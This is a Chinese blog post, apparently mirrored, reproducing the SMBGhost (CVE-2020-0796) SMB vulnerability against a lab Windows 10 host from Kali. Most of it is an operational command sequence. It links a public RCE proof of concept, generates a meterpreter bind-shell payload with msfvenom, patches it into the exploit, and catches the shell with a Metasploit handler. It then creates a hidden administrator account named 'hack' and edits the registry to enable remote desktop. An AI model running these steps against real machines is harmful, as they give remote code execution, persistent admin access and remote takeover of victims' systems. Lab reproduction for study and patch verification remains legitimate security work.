zoukankan      html  css  js  c++  java
  • CVE-2020-0796复现

    今天整理资料时发现了之前存的一个cve漏洞复现过程,当时打算跟着复现来着,后来也没去复现,今天刚好有时间,所以来复现一下这个漏洞

    漏洞讲解

    https://www.freebuf.com/vuls/233263.html
    https://blog.csdn.net/RatOnSea/article/details/106399450
    https://www.cnblogs.com/A66666/p/29635a243378b49ccb485c7a280df989.html
    

    漏洞复现

    下文中所使用的文件

    镜像:ed2k://|file|cn_windows_10_business_editions_version_1903_x64_dvd_e001dd2c.iso|4815527936|47D4C57E638DF8BF74C59261E2CE702D|
    Scanner:
    1.https://github.com/ollypwn/SMBGhost
    2.http://dl.qianxin.com/skylar6/CVE-2020-0796-Scanner.zip
    POC:https://github.com/chompie1337/SMBGhost_RCE_PoC.git
    

    靶机信息

    Windows10:192.168.0.129
    kali:192.168.0.130

    漏洞扫描

    python3 scanner.py 192.168.0.129
    

    使用metasploit生成脚本

    msfvenom -p windows/x64/meterpreter/bind_tcp lport=6666 -f py -o tool.py
    

    将poc中的exploit.py中的USER_PAYLOAD替换为metasploit生成的buf


    使用metasploit对6666端口进行监听

    msfconsole
    use exploit/multi/handler
    set payload windows/x64/meterpreter/bind_tcp
    show options
    set LPORT 6666
    set RHOST 192.168.0.129
    exploit
    


    运行之前修改的exploit.py

    python3 exploit1.py -ip 192.168.0.129
    



    成功拿到shell,完成复现

    提权

    创建新用户

    net user hack hack /add
    

    加入管理员组中

    net localgroup Administrators hack /add
    net localgroup Users hack /del
    

    查看当前用户的信息

    net user hack
    

    获得一个管理员权限的账号,尝试使用远程连接工具进行连接

    开启远程连接功能

    发现无法连接,使用如下命令开启远程连接功能

    REG ADD HKLMSYSTEMCurrentControlSetControlTerminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
    


    连接成功,获得权限

    等待30秒后即可成功连接

  • 相关阅读:
    【Java】:判断数据类型
    【Shell编程】:多命令处理
    正则表达式
    26、DIEN(DIN的延伸)
    25、深层用户兴趣网络DIN(阿里)
    强化学习(7)---动态规划
    强化学习(6)---马尔可夫过程
    ubuntu出现终端和浏览器输入法不能显示中文,但是ubuntu software可以显示(fcitx)
    ASP.NET实现企业微信接入应用实现身份认证
    DevOps
  • 原文地址:https://www.cnblogs.com/anweilx/p/13056586.html
Copyright © 2011-2022 走看看